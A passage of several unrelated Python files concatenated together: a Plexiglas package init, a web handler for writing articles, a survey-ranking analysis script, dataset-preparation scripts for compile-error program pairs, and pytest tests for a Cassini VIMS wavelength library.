    """Self-test; raises in optimized mode where asserts are stripped."""
    if not __debug__:
        raise AssertionError('debug mode is off, so no tests will be run')
    # Each extra call without an argument adds one 'o' to the spelled word.
    for depth, word in ((3, 'goooal'), (2, 'gooal'), (1, 'goal'), (0, 'gal')):
        fn = g
        for _ in range(depth):
            fn = fn()
        assert fn('al') == word
    assert g('houl') == 'ghoul'


if __name__ == '__main__':
    main()
|
"""
Plexiglas is a script which helps you to copy your content from a Plex server to any other storage.
I'm using it especially for copying movies and tv-shows from my main server to a "travel" instance, which is set up
on my external HDD (WD My Passport Wireless Pro).
"""
# Placeholder replaced with the real version by the CI pipeline at release time.
__version__ = '_CI_SET_VERSION_'

import logging

# Prefer the real `keyring` package; fall back to the bundled stub (with a
# no-op set_keyring) so Plexiglas still runs when keyring is not installed.
try:
    import keyring  # noqa: F401
    from keyring.core import set_keyring
except ImportError:
    import keyring_stub as keyring  # noqa: F401

    def set_keyring(x):
        """No-op fallback: without the real keyring there is no backend to set."""
        pass

# Package-wide logger used by the plexiglas modules.
log = logging.getLogger('plexiglas')
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from base import BaseHandler
import time
import sys
sys.path.append('..')
from models.user import User
from models.card import Card
from models.story import Story
from models.article import Article
class WriteHandler(BaseHandler):
    """Editor page: compose free posts, card entries, or story entries."""

    def get(self):
        """Render the editor, or bounce anonymous visitors to the login page."""
        user = User.get_user_by_name(self.get_current_user())
        if len(user) == 0:
            self.redirect("/login")
            return
        cid = self.get_argument("cid", None)
        sid = self.get_argument("sid", None)
        # the presence of cid/sid decides which kind of article is written
        if cid is not None:
            Class = "card"
        elif sid is not None:
            Class = "story"
        else:
            Class = "free"
        self.render("write.html",
                    user=user,
                    card=Card.get_by_cid(cid),
                    story=Story.get_by_sid(sid),
                    Class=Class)

    def post(self):
        """Persist a submitted article and redirect to the matching section."""
        uid = self.get_argument("uid", 10000000)
        Class = self.get_argument("Class", None)
        kid = self.get_argument("kid", None)
        title = self.get_argument("title", "无题")
        content = self.get_argument("content", None)
        label = self.get_argument("label", "")
        date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
        if content is not None:
            # NOTE(review): `kid` is passed twice — confirm against
            # Article.add_one_article's signature.
            Article.add_one_article(Class, uid, kid, kid, "1", label, title,
                                    content, "none", date)
            # bump the author's per-kind article counter
            if Class == "story":
                User.add_one_nstory(uid)
            elif Class == "card":
                User.add_one_ncard(uid)
            elif Class == "free":
                User.add_one_nfree(uid)
            self.redirect("/" + Class)
        # empty submissions are sent back to the editor they came from
        elif Class == "story":
            self.redirect("/write?sid=" + str(kid))
        elif Class == "card":
            self.redirect("/write?cid=" + str(kid))
        else:
            self.redirect("/write")
|
""" Analyze cleaned survey data
See anonymize_data.py for structure of data frame.
Run tests with::
pytest test_analyze_data.py
"""
from __future__ import division
import numpy as np
def ana_question(df, q_root, row_weights=None):
    """Composite score per answer option for question *q_root*.

    'yes' ranks receive a +1 bonus over 'maybe' ranks; unanswered cells
    count as 0.  Optional *row_weights* scales each respondent's
    contribution.

    Returns:
        dict mapping option name -> summed score across respondents.
    """
    row_weights = 1 if row_weights is None else np.array(row_weights)[:, None]
    yes_qs = [q for q in df.columns
              if q.startswith(q_root + '-ranks-yes')]
    maybe_qs = [q for q in df.columns
                if q.startswith(q_root + '-ranks-maybe')]
    # .to_numpy() replaces DataFrame.as_matrix(), which was deprecated in
    # pandas 0.23 and removed in pandas 1.0.
    yes_rescaled = ((ana_part(df[yes_qs]) + 1).fillna(0).to_numpy() *
                    row_weights)
    maybe_rescaled = ana_part(df[maybe_qs]).fillna(0).to_numpy() * row_weights
    values = (yes_rescaled + maybe_rescaled).sum(axis=0)
    names = [q.split('-')[-1] for q in yes_qs]
    return dict(zip(names, values))


def get_categories(df):
    """Return the column names that encode category rankings."""
    return [q for q in df.columns if q.startswith('category')]


def category_weights(df):
    """Per-respondent weight for each category, derived from its rank."""
    categories = get_categories(df)
    weights = ana_part(df[categories]).fillna(0)
    cat_names = [q.split('-')[-1] for q in categories]
    weights.columns = cat_names
    return weights


def ana_part(cols):
    """Rescale ranks so rank 1 -> 1 and rank n -> 1/n (n = column count)."""
    n = len(cols.columns)
    return (n - (cols - 1)) / n
def process_data(df):
    """Compute mean ranks plus raw and category-weighted composite scores.

    Returns:
        tuple of (cat_rank_mean, cat_scores, w_cat_scores) dictionaries,
        each keyed by category name.
    """
    categories = get_categories(df)
    weights = category_weights(df)
    cat_names = weights.columns
    cat_rank_mean = dict(zip(cat_names, df[categories].mean()))
    cat_scores = {cat: ana_question(df, cat) for cat in cat_names}
    w_cat_scores = {cat: ana_question(df, cat, weights[cat])
                    for cat in cat_names}
    return cat_rank_mean, cat_scores, w_cat_scores
def main():
    """Print mean ranks and composite scores for thw_survey.csv."""
    from pprint import pprint
    import pandas as pd
    frame = pd.read_csv('thw_survey.csv')
    rank_means, scores, weighted_scores = process_data(frame)
    for title, payload in (
            ('Mean rank of categories', rank_means),
            ('Composite ranking score within categories', scores),
            ('Weighted composite ranking score within categories',
             weighted_scores)):
        print(title)
        pprint(payload)


if __name__ == '__main__':
    main()
|
from datetime import datetime
from sklearn.model_selection import train_test_split
from Symbolic.AbstractConverter import AbstractConverter
from Symbolic.CigarSrcTrgt import getUnicodeStrs, getUnicodeDicts
from Symbolic.DataStructs import Code
from Common.utils import *
import pandas as pd
import edlib
from timeit import default_timer as timer
from Common import ConfigFile as CF, utils
def getAlignDict(srcAbs, trgtAbs):
    """Align source/target abstraction tokens with edlib.

    Tokens are mapped to unicode characters first so edlib can diff them.
    Returns edlib's alignment dict, or a plain cigar string for the
    empty-target corner cases edlib cannot handle.
    """
    dictAbs_Unicode, _ = getUnicodeDicts(srcAbs, trgtAbs)
    srcAbsUni = getUnicodeStrs(dictAbs_Unicode, srcAbs)
    trgtAbsUni = getUnicodeStrs(dictAbs_Unicode, trgtAbs)
    if len(trgtAbsUni) != 0:
        return edlib.align(trgtAbsUni, srcAbsUni, task='path')
    # edlib crashes on an empty target, so handle it manually: delete every
    # source symbol, or do nothing when the source is empty too.
    if len(srcAbsUni) == 0:
        return ''
    return '{}D'.format(len(srcAbsUni))
def getStats(filename):
    """Print alignment statistics for the source/target pairs in *filename*.

    For every row, abstracts both programs, counts rows whose abstractions
    differ in length, and counts rows where more than one line differs.
    """
    df = pd.read_csv(filename)
    diffLen = []            # row indices whose src/trgt abstraction lengths differ
    exceptions = []         # (row index, error message) pairs
    moreThanOne = 0         # rows where more than one line differs
    srcAbstractionTime = 0
    trgtAbstractionTime = 0
    for i, row in df.iterrows():
        # NOTE(review): looks like a leftover resume point from a previous
        # crashed run — confirm whether skipping the first 888 rows is intended.
        if i < 888:
            continue
        if i % 100 == 0:
            print('At {}/{}'.format(i, df.shape[0]))
        try:
            sourceText = row['sourceText']
            sourceText = sourceText.split("\n")
            trgtText = row['targetText']
            trgtText = trgtText.split('\n')
            start = timer()
            sourceCode = Code(sourceText)
            abstractConverter = AbstractConverter(sourceCode, inferTypes=False, debug=False)
            srcTokenizedCode, srcAbstractCode, srcSymbTable = abstractConverter.getAbstractionAntlr()
            srcAbstractionTime += timer() - start
            start = timer()
            trgtCode = Code(trgtText)
            abstractConverter = AbstractConverter(trgtCode, inferTypes=False, debug=False)
            trgtTokenizedCode, trgtAbstractCode, trgtSymbTable = abstractConverter.getAbstractionAntlr()
            trgtAbstractionTime += timer() - start
            if len(srcAbstractCode) != len(trgtAbstractCode):
                diffLen.append(i)
            # collect 1-based line numbers whose abstractions differ
            differentLines = []
            for j in range(min(len(srcAbstractCode), len(trgtAbstractCode))):
                srcAbsLine = srcAbstractCode[j]
                trgtAbsLine = trgtAbstractCode[j]
                alignDict = getAlignDict(srcAbsLine, trgtAbsLine)
                # getAlignDict returns a plain string for empty targets,
                # hence the isinstance check
                if isinstance(alignDict, dict) and alignDict['editDistance'] > 0:
                    differentLines.append(j + 1)
            if len(differentLines) > 1:
                moreThanOne += 1
        except Exception as e:
            # traceback.print_stack()
            exceptions.append((i, str(e)))
            # break
    for ex in exceptions:
        print(ex)
    print('More than one line differs ', moreThanOne)
    print("Abstraction times: src :{} , trgt: {}".format(srcAbstractionTime, trgtAbstractionTime))
def splitMultiLineData(df):
    """Split multi-line-diff pairs into one single-line-diff row per line.

    For each differing line, builds a new source program that is the target
    with just that one line replaced by the source's version, and keeps the
    row only if the new program still reports a compile error.

    Returns:
        A new DataFrame of the generated single-line rows.
    """
    # df = pd.read_csv(filename)
    diffLen = []            # row indices whose src/trgt abstraction lengths differ
    exceptions = []         # (row index, error message) pairs
    moreThanOne = 0
    srcAbstractionTime = 0
    trgtAbstractionTime = 0
    # outDf = df.copy()
    outDf = pd.DataFrame(columns=df.columns)
    outDf["sourceError"] = ""
    outDf["sourceLineTypeAbs"] = ""
    outDf["targetLineTypeAbs"] = ""
    moreThanOne = 0  # NOTE(review): duplicate initialization, harmless
    for i, row in df.iterrows():
        # if i < 64:
        #     continue
        if i % 100 == 0:
            print('At {}/{}'.format(i, df.shape[0]))
        try:
            sourceText, trgtText = utils.readSrcTrgtText(row)
            start = timer()
            # abstract the source twice: plain tokens and type-inferred tokens
            sourceCode = Code(sourceText)
            abstractConverter = AbstractConverter(sourceCode, inferTypes=False, debug=False)
            srcTokenizedCode, srcAbstractCode, srcSymbTable = abstractConverter.getAbstractionAntlr()
            abstractConverter = AbstractConverter(sourceCode, inferTypes=True, debug=False)
            srcTypeTokenizedCode, srcTypeAbstractCode, srcTypeSymbTable = abstractConverter.getAbstractionAntlr()
            srcAbstractionTime += timer() - start
            start = timer()
            # same two abstractions for the target
            trgtCode = Code(trgtText)
            abstractConverter = AbstractConverter(trgtCode, inferTypes=False, debug=False)
            trgtTokenizedCode, trgtAbstractCode, trgtSymbTable = abstractConverter.getAbstractionAntlr()
            abstractConverter = AbstractConverter(trgtCode, inferTypes=True, debug=False)
            trgtTypeTokenizedCode, trgtTypeAbstractCode, trgtTypeSymbTable = abstractConverter.getAbstractionAntlr()
            trgtAbstractionTime += timer() - start
            if len(srcAbstractCode) != len(trgtAbstractCode):
                diffLen.append(i)
            differentLines = []
            for j in range(min(len(srcAbstractCode), len(trgtAbstractCode))):
                srcAbsLine = srcAbstractCode[j]
                trgtAbsLine = trgtAbstractCode[j]
                alignDict = getAlignDict(srcAbsLine, trgtAbsLine)
                # print('align', type(alignDict))
                if isinstance(alignDict, dict) and alignDict['editDistance'] > 0:
                    differentLines.append(j + 1)
                    # take the (correct) target program and re-introduce only
                    # this one broken source line
                    tmpSrc = deepcopy(trgtText)
                    tmpSrcAbs = deepcopy(trgtAbstractCode)
                    tmpSrc[j] = sourceText[j]
                    tmpSrcAbs[j] = srcAbstractCode[j]
                    newRow = row.copy()
                    newRow['sourceText'] = joinList(tmpSrc)
                    newRow['targetText'] = row['targetText']
                    newRow['sourceAbs'] = joinLL(tmpSrcAbs)
                    newRow['targetAbs'] = joinLL(trgtAbstractCode)
                    newRow['sourceLineText'] = sourceText[j]
                    newRow['targetLineText'] = trgtText[j]
                    newRow['sourceLineAbs'] = joinList(srcAbstractCode[j], joinStr=' ')
                    newRow['targetLineAbs'] = joinList(trgtAbstractCode[j], joinStr=' ')
                    newRow['sourceLineTypeAbs'] = joinList(srcTypeAbstractCode[j], joinStr=' ')
                    newRow['targetLineTypeAbs'] = joinList(trgtTypeAbstractCode[j], joinStr=' ')
                    newRow['lineNums_Abs'] = str(j + 1)
                    # keep the row only if the hybrid program still errors
                    tmpCode = Code(tmpSrc)
                    errInfo = tmpCode.getErrorInfo()
                    newRow['sourceError'] = str(errInfo)
                    if errInfo.lineNo != -1:
                        # NOTE(review): DataFrame.append was removed in
                        # pandas 2.0 — confirm the pinned pandas version.
                        outDf = outDf.append(newRow)
                    # print(newRow)
                    del newRow
            if len(differentLines) > 1:
                moreThanOne += 1
        except Exception as e:
            print('exception ', str(e))
            exceptions.append((i, str(e)))
    for ex in exceptions:
        print(ex)
    print(len(exceptions))
    print(moreThanOne)
    print("Abstraction times: src :{} , trgt: {}".format(srcAbstractionTime, trgtAbstractionTime))
    print(outDf.shape)
    return outDf
def generateFullData(single=False):
    """Regenerate single-line rows from all three datasets and write a CSV.

    When *single* is True only the single-line input contributes to the
    output; the other two are still processed (and their progress printed).
    """
    singleFile = './data/Python CEs/singleL_srcTrgtPairs.csv'
    multiFile = './data/Python CEs/multL_srcTrgtPairs.csv'
    zeroFile = './data/Python CEs/zeroDiff_srcTrgtPairs.csv'
    outDf1 = splitMultiLineData(pd.read_csv(singleFile))
    print("multi")
    outDf2 = splitMultiLineData(pd.read_csv(multiFile))
    print("zero")
    outDf3 = splitMultiLineData(pd.read_csv(zeroFile))
    if single:
        outDf = outDf1
    else:
        outDf = pd.concat([outDf1, outDf2, outDf3], ignore_index=True)
    # write next to the single-line input, stamped with the current time
    out_dir = '/'.join(singleFile.split('/')[:-1])
    stamp = str(datetime.now().strftime("%H_%M_%S"))
    outDf.to_csv(out_dir + "/generatedSL" + stamp + ".csv")
def createEmptyDF(df):
    """Return an empty frame with df's columns plus the line-level extras."""
    shell = pd.DataFrame(columns=df.columns)
    for extra in ("sourceError", "sourceLineTypeAbs", "targetLineTypeAbs"):
        shell[extra] = ""
    return shell
def prepareAndAddRow(row, df, lineNos, sourceCode, sourceText, srcAbstractCode, srcTypeAbstractCode,
                     trgtText, trgtAbstractCode, trgtTypeAbstractCode):
    """Fill a result row with line-level source/target info and append it.

    Only rows whose source program actually reports an error line
    (errInfo.lineNo != -1) are kept.

    Returns:
        The (possibly extended) DataFrame.
    """
    newRow = row.copy()
    if len(lineNos) == 0:
        lineNo = -1
    else:
        lineNo = int(lineNos[0])
    newRow['sourceAbs'] = joinLL(srcAbstractCode)
    newRow['targetAbs'] = joinLL(trgtAbstractCode)
    if lineNo > 0:
        # source/trgt might be missing the line entirely, hence the bounds checks
        newRow['sourceLineText'] = '' if lineNo > len(sourceText) else sourceText[
            lineNo - 1]
        newRow['targetLineText'] = '' if lineNo > len(trgtText) else trgtText[lineNo - 1]
        newRow['sourceLineAbs'] = '' if lineNo > len(srcAbstractCode) \
            else joinList(srcAbstractCode[lineNo - 1], joinStr=' ')
        newRow['targetLineAbs'] = '' if lineNo > len(trgtAbstractCode) \
            else joinList(trgtAbstractCode[lineNo - 1], joinStr=' ')
        newRow['sourceLineTypeAbs'] = '' if lineNo > len(srcTypeAbstractCode) \
            else joinList(srcTypeAbstractCode[lineNo - 1], joinStr=' ')
        newRow['targetLineTypeAbs'] = '' if lineNo > len(trgtTypeAbstractCode) \
            else joinList(trgtTypeAbstractCode[lineNo - 1], joinStr=' ')
    else:
        print("her", lineNo, end=" ")
        pass
    # serialize the line-number list: newline-joined, single value, or -1
    if len(lineNos) > 1:
        lineNos = list(map(str, lineNos))
        lineNos = str("\n".join(lineNos))
    elif len(lineNos) == 1:
        lineNos = lineNos[0]
    else:
        lineNos = -1
    newRow['lineNums_Abs'] = str(lineNos)
    errInfo = sourceCode.getErrorInfo()
    newRow['sourceError'] = str(errInfo)
    if errInfo.lineNo != -1:
        # DataFrame.append was removed in pandas 2.0; concatenate a one-row
        # frame built from the Series instead (same index behaviour).
        df = pd.concat([df, newRow.to_frame().T])
    del newRow
    return df
def reorganizeData(new=False):
    """Re-bucket src/trgt pairs into zero/single/multi-line-diff datasets.

    Reads the three input CSVs, recomputes the set of differing lines for
    each pair, and writes newZeroLine/newSingleLine/newMultiLine CSVs next
    to their inputs.

    Args:
        new: when True, read from the dataset-2 directory instead of the
            original "Python CEs" files.
    """
    if new:
        singleFile = '../../data/dataset-2/singleL.csv'
        multiFile = '../../data/dataset-2/multL.csv'
        zeroFile = '../../data/dataset-2/zeroL.csv'
    else:
        singleFile = '../../data/Python CEs/singleL_srcTrgtPairs.csv'
        multiFile = '../../data/Python CEs/multL_srcTrgtPairs.csv'
        zeroFile = '../../data/Python CEs/zeroDiff_srcTrgtPairs.csv'
    singleInput = pd.read_csv(singleFile)
    multiInput = pd.read_csv(multiFile)
    zeroInput = pd.read_csv(zeroFile)
    singleOutput = createEmptyDF(singleInput)
    multiOutput = createEmptyDF(multiInput)
    zeroOutput = createEmptyDF(zeroInput)
    diffLen = []
    exceptions = []
    # Fixed: the results were previously assigned to a misspelled
    # `excpetions` name — it only worked because the list is mutated
    # in place inside seperateDatasets.
    for inputDf in (singleInput, multiInput, zeroInput):
        diffLen, exceptions, multiOutput, singleOutput, zeroOutput = \
            seperateDatasets(diffLen, exceptions, multiOutput, inputDf,
                             singleOutput, zeroOutput)
    for ex in exceptions:
        print(ex)
    print(diffLen)
    singleOutput.to_csv('/'.join(singleFile.split('/')[:-1]) + "/newSingleLine.csv")
    multiOutput.to_csv('/'.join(multiFile.split('/')[:-1]) + "/newMultiLine.csv")
    zeroOutput.to_csv('/'.join(zeroFile.split('/')[:-1]) + "/newZeroLine.csv")
def seperateDatasets(diffLen, exceptions, multiOutput, singleInput, singleOutput, zeroOutput):
    """Route each row of *singleInput* into the zero/single/multi outputs.

    NOTE(review): despite its name, *singleInput* is any input frame — the
    caller passes all three datasets through this same function.

    Returns:
        (diffLen, exceptions, multiOutput, singleOutput, zeroOutput), with
        diffLen/exceptions also mutated in place.
    """
    for i, row in singleInput.iterrows():
        if i % 100 == 0:
            print('At {}/{}'.format(i, singleInput.shape[0]))
        try:
            sourceText, trgtText = utils.readSrcTrgtText(row)
            # NOTE(review): timer() results are never read here — leftover
            # timing instrumentation.
            start = timer()
            # abstract the source twice: plain tokens and type-inferred tokens
            sourceCode = Code(sourceText)
            abstractConverter = AbstractConverter(sourceCode, inferTypes=False, debug=False)
            srcTokenizedCode, srcAbstractCode, srcSymbTable = abstractConverter.getAbstractionAntlr()
            abstractConverter = AbstractConverter(sourceCode, inferTypes=True, debug=False)
            srcTypeTokenizedCode, srcTypeAbstractCode, srcTypeSymbTable = abstractConverter.getAbstractionAntlr()
            start = timer()
            # same two abstractions for the target
            trgtCode = Code(trgtText)
            abstractConverter = AbstractConverter(trgtCode, inferTypes=False, debug=False)
            trgtTokenizedCode, trgtAbstractCode, trgtSymbTable = abstractConverter.getAbstractionAntlr()
            abstractConverter = AbstractConverter(trgtCode, inferTypes=True, debug=False)
            trgtTypeTokenizedCode, trgtTypeAbstractCode, trgtTypeSymbTable = abstractConverter.getAbstractionAntlr()
            if len(srcAbstractCode) != len(trgtAbstractCode):
                diffLen.append(i)
            # 1-based line numbers whose abstractions differ
            differentLines = []
            minLen = min(len(srcAbstractCode), len(trgtAbstractCode))
            for j in range(minLen):
                srcAbsLine = srcAbstractCode[j]
                trgtAbsLine = trgtAbstractCode[j]
                alignDict = getAlignDict(srcAbsLine, trgtAbsLine)
                # print('align', type(alignDict))
                if isinstance(alignDict, dict) and alignDict['editDistance'] > 0:
                    differentLines.append(j + 1)
                # a line empty on exactly one side also counts as different
                elif (len(srcAbsLine) == 0 and len(trgtAbsLine) != 0) or (len(srcAbsLine) != 0 and len(trgtAbsLine) == 0):
                    differentLines.append(j + 1)
            # any surplus lines on the longer side are different by definition
            for j in range(abs(len(srcAbstractCode) - len(trgtAbstractCode))):
                l = minLen + j
                differentLines.append(l + 1)
            if len(differentLines) == 0:
                # zeroDiff
                zeroOutput = prepareAndAddRow(row, zeroOutput, differentLines, sourceCode, sourceText,
                                              srcAbstractCode,
                                              srcTypeAbstractCode, trgtText, trgtAbstractCode, trgtTypeAbstractCode)
            elif len(differentLines) == 1:
                # singleDiff
                singleOutput = prepareAndAddRow(row, singleOutput, differentLines, sourceCode, sourceText,
                                                srcAbstractCode,
                                                srcTypeAbstractCode, trgtText, trgtAbstractCode, trgtTypeAbstractCode)
            else:
                multiOutput = prepareAndAddRow(row, multiOutput, differentLines, sourceCode, sourceText,
                                               srcAbstractCode,
                                               srcTypeAbstractCode, trgtText, trgtAbstractCode, trgtTypeAbstractCode)
        except Exception as e:
            print('exception ', str(e))
            exceptions.append((i, str(e)))
    return diffLen, exceptions, multiOutput, singleOutput, zeroOutput
def splitData(filename):
    """Write an 80/20 train/test split of a CSV next to the input file."""
    frame = pd.read_csv(filename)
    train, test = train_test_split(frame, test_size=0.2, random_state=42, shuffle=True)
    parent = "/".join(filename.split('/')[:-1])
    leaf = filename.split("/")[-1]
    train.to_csv(parent + "/train" + leaf)
    test.to_csv(parent + "/test" + leaf)
def mergeCSVs(csv1, csv2, out_file):
    """Concatenate two CSV files row-wise and write the result to *out_file*."""
    merged = pd.concat([pd.read_csv(csv1), pd.read_csv(csv2)])
    merged.to_csv(out_file, index=False)
if __name__ == '__main__':
    # getStats(filename='./data/Python CEs/zeroDiff_srcTrgtPairs.csv')
    # splitMultiLineData(filename='./data/Python CEs/singleL_srcTrgtPairs.csv')
    # generateFullData()
    # splitData(CF.dataPath + '/newSingleLine.csv')
    # reorganizeData(new=True)
    # Current entry point: merge the old and regenerated single-line datasets.
    mergeCSVs(CF.dataPath + "/newSingleLine.csv", CF.newDataPath + "/newSingleLine.csv", CF.dataPath + "/mergedNewSingleLine.csv")
    # mergeCSVs(CF.fnameSingleL_Test_new, CF.fnameSingleL_Test, CF.dataPath + "/mergedTest.csv")
|
"""Test VIMS wavelength module."""
from pathlib import Path
import numpy as np
from numpy.testing import assert_array_almost_equal as assert_array
from pyvims import QUB
from pyvims.vars import ROOT_DATA
from pyvims.wvlns import (BAD_IR_PIXELS, CHANNELS, FWHM, SHIFT,
VIMS_IR, VIMS_VIS, WLNS, YEARS,
bad_ir_pixels, ir_multiplexer, ir_hot_pixels,
is_hot_pixel, median_spectrum, moving_median,
sample_line_axes)
from pytest import approx, raises
DATA = Path(__file__).parent / 'data'
def test_vims_csv():
    """Test CSV global variables."""
    # channel/wavelength/FWHM tables cover all 352 VIMS bands
    assert len(CHANNELS) == len(WLNS) == len(FWHM) == 352
    for table, first, last in ((CHANNELS, 1, 352),
                               (WLNS, .350540, 5.1225),
                               (FWHM, .007368, .016)):
        assert table[0] == first
        assert table[-1] == last
    # wavelength-shift history spans the mission years
    assert len(YEARS) == len(SHIFT) == 58
    for table, first, last in ((YEARS, 1999.6, 2017.8),
                               (SHIFT, -25.8, 9.8)):
        assert table[0] == first
        assert table[-1] == last
def test_vims_ir():
    """Test VIMS IR wavelengths (bands 97-352)."""
    # Standard wavelengths
    wvlns = VIMS_IR()
    assert len(wvlns) == 256
    assert wvlns[0] == .884210
    assert wvlns[-1] == 5.122500
    # Full-width at half maximum value
    fwhms = VIMS_IR(fwhm=True)
    assert len(fwhms) == 256
    assert fwhms[0] == .012878
    assert fwhms[-1] == .016
    # Wavenumber (cm-1)
    wvnb = VIMS_IR(sigma=True)
    assert len(wvnb) == 256
    assert wvnb[0] == approx(11309.53, abs=1e-2)
    assert wvnb[-1] == approx(1952.17, abs=1e-2)
    # Single band
    assert VIMS_IR(band=97) == .884210
    assert VIMS_IR(band=97, fwhm=True) == .012878
    assert VIMS_IR(band=97, sigma=True) == approx(11309.53, abs=1e-2)
    assert VIMS_IR(band=97, fwhm=True, sigma=True) == approx(164.72, abs=1e-2)
    # Selected bands array
    assert_array(VIMS_IR(band=[97, 352]), [.884210, 5.122500])
    assert_array(VIMS_IR(band=[97, 352], fwhm=True), [.012878, .016])
    # Time offset: reference years leave the wavelength unchanged
    assert VIMS_IR(band=97, year=2002) == approx(.884210, abs=1e-6)
    assert VIMS_IR(band=97, year=2005) == approx(.884210, abs=1e-6)
    assert VIMS_IR(band=97, year=2001.5) == approx(.885410, abs=1e-6)  # +.0012
    assert VIMS_IR(band=97, year=2011) == approx(.890210, abs=1e-6)  # +.006
    # Time offset on all IR bands
    wvlns_2011 = VIMS_IR(year=2011)
    assert len(wvlns_2011) == 256
    assert wvlns_2011[0] == approx(.890210, abs=1e-6)
    assert wvlns_2011[-1] == approx(5.128500, abs=1e-6)
    # No change in FWHM with time
    assert VIMS_IR(band=97, year=2001.5, fwhm=True) == .012878
    # Outside IR band range -> NaN rather than an exception
    assert np.isnan(VIMS_IR(band=0))
    assert np.isnan(VIMS_IR(band=96, fwhm=True))
    assert np.isnan(VIMS_IR(band=353, sigma=True))
def test_vims_vis():
    """Test VIMS VIS wavelengths.

    The VIS detector covers bands 1..96; time offsets are not supported
    for VIS and must raise a ValueError.
    """
    # Standard wavelengths
    wvlns = VIMS_VIS()
    assert len(wvlns) == 96
    assert wvlns[0] == .350540
    assert wvlns[-1] == 1.045980
    # Full-width at half maximum value
    fwhms = VIMS_VIS(fwhm=True)
    assert len(fwhms) == 96
    assert fwhms[0] == .007368
    assert fwhms[-1] == .012480
    # Wavenumber (cm-1)
    wvnb = VIMS_VIS(sigma=True)
    assert len(wvnb) == 96
    assert wvnb[0] == approx(28527.41, abs=1e-2)
    assert wvnb[-1] == approx(9560.41, abs=1e-2)
    # Single band
    assert VIMS_VIS(band=96) == 1.045980
    assert VIMS_VIS(band=96, fwhm=True) == .012480
    assert VIMS_VIS(band=96, sigma=True) == approx(9560.41, abs=1e-2)
    assert VIMS_VIS(band=96, fwhm=True, sigma=True) == approx(114.07, abs=1e-2)
    # Selected bands array
    assert_array(VIMS_VIS(band=[1, 96]), [.350540, 1.045980])
    assert_array(VIMS_VIS(band=[1, 96], fwhm=True), [.007368, .012480])
    # Time offset is an IR-only feature
    with raises(ValueError):
        _ = VIMS_VIS(band=97, year=2002)
    with raises(ValueError):
        _ = VIMS_VIS(year=2011)
    # Outside VIS band range
    assert np.isnan(VIMS_VIS(band=0))
    assert np.isnan(VIMS_VIS(band=97, fwhm=True))
    assert np.isnan(VIMS_VIS(band=353, sigma=True))
def test_bad_ir_pixels():
    """Test bad IR pixels list.

    Rebuilds the bad-pixel groups from the wavelength CSV (IR rows whose
    comment column is non-empty) and checks they match BAD_IR_PIXELS and
    the matplotlib collection returned by bad_ir_pixels().
    """
    # skiprows=98 skips the header and the 96 VIS channels (IR starts at 97).
    csv = np.loadtxt(ROOT_DATA / 'wvlns_std.csv',
                     delimiter=',', usecols=(0, 1, 2, 3),
                     dtype=str, skiprows=98)
    # Extract bad pixels: (channel, left wavelength edge, width).
    wvlns = np.transpose([
        (int(channel), float(wvln) - .5 * float(fwhm), float(fwhm))
        for channel, wvln, fwhm, comment in csv
        if comment
    ])
    # Group bad pixels: start a new group when flagged channels are more
    # than 1.5 channels apart, otherwise widen the previous group.
    news = [True] + list((wvlns[0, 1:] - wvlns[0, :-1]) > 1.5)
    bads = []
    for i, new in enumerate(news):
        if new:
            bads.append(list(wvlns[1:, i]))
        else:
            bads[-1][1] += wvlns[2, i]
    assert_array(BAD_IR_PIXELS, bads)
    coll = bad_ir_pixels()
    assert len(coll.get_paths()) == len(bads)
def test_moving_median():
    """Test moving median filter.

    Covers odd widths (centered window) and even widths; edge values are
    computed on the truncated window.
    """
    a = [1, 2, 3, 4, 5]
    assert_array(moving_median(a, width=1), a)
    assert_array(moving_median(a, width=3),
                 [1.5, 2, 3, 4, 4.5])
    assert_array(moving_median(a, width=5),
                 [2, 2.5, 3, 3.5, 4])
    # Even widths: the window is asymmetric around each sample.
    assert_array(moving_median(a, width=2),
                 [1.5, 2.5, 3.5, 4.5, 5])
    assert_array(moving_median(a, width=4),
                 [2, 2.5, 3.5, 4, 4.5])
def test_is_hot_pixel():
    """Test hot pixel detector."""
    # Create random signal (integers in [0, 20))
    signal = np.random.default_rng().integers(20, size=100)
    # Add hot pixels: indices 10, 30, 50, 70, 90 get 50, then
    # indices 10, 40, 70 are overwritten with 150.
    signal[10::20] = 50
    signal[10::30] = 150
    hot_pix = is_hot_pixel(signal)
    assert len(hot_pix) == 100
    # NOTE(review): the baseline is random, so these count bounds are
    # statistical -- the test could flake on unlucky draws.
    assert 3 <= sum(hot_pix) < 6
    assert all(hot_pix[10::30])
    # Lower tolerance / percentile catches the moderately hot pixels too.
    hot_pix = is_hot_pixel(signal, tol=1.5, frac=90)
    assert len(hot_pix) == 100
    assert 6 <= sum(hot_pix) < 12
    assert all(hot_pix[10::20])
def test_sample_line_axes():
    """Test location of sample and line axes.

    The band axis is identified by its size (352); the returned tuple
    lists the remaining (sample/line) axes.
    """
    # 2D case
    assert sample_line_axes((64, 352)) == (0, )
    assert sample_line_axes((256, 32)) == (1, )
    # 3D case
    assert sample_line_axes((32, 64, 352)) == (0, 1)
    assert sample_line_axes((32, 352, 64)) == (0, 2)
    assert sample_line_axes((352, 32, 64)) == (1, 2)
    # 1D case
    # NOTE(review): (352) is an int, not the 1-tuple (352,), so the
    # TypeError may come from the int argument rather than a 1D shape;
    # confirm the intended input.
    with raises(TypeError):
        _ = sample_line_axes((352))
    # No band axis
    with raises(ValueError):
        _ = sample_line_axes((64, 64))
def test_median_spectrum():
    """Test the median spectrum extraction.

    The band axis (length 352) must be located automatically regardless
    of its position in 2D or 3D input.
    """
    # 2D cases
    spectra = [CHANNELS, CHANNELS]
    spectrum = median_spectrum(spectra)  # (2, 352)
    assert spectrum.shape == (352,)
    assert spectrum[0] == 1
    assert spectrum[-1] == 352
    spectrum = median_spectrum(np.transpose(spectra))  # (352, 2)
    assert spectrum.shape == (352,)
    assert spectrum[0] == 1
    assert spectrum[-1] == 352
    # 3D cases
    spectra = [[CHANNELS, CHANNELS]]
    spectrum = median_spectrum(spectra)  # (1, 2, 352)
    assert spectrum.shape == (352,)
    assert spectrum[0] == 1
    assert spectrum[-1] == 352
    spectrum = median_spectrum(np.moveaxis(spectra, 1, 2))  # (1, 352, 2)
    assert spectrum.shape == (352,)
    assert spectrum[0] == 1
    assert spectrum[-1] == 352
    spectrum = median_spectrum(np.moveaxis(spectra, 2, 0))  # (352, 1, 2)
    assert spectrum.shape == (352,)
    assert spectrum[0] == 1
    assert spectrum[-1] == 352
def test_ir_multiplexer():
    """Test spectrum split in each IR multiplexer.

    IR channels (97..352) alternate between the two multiplexers:
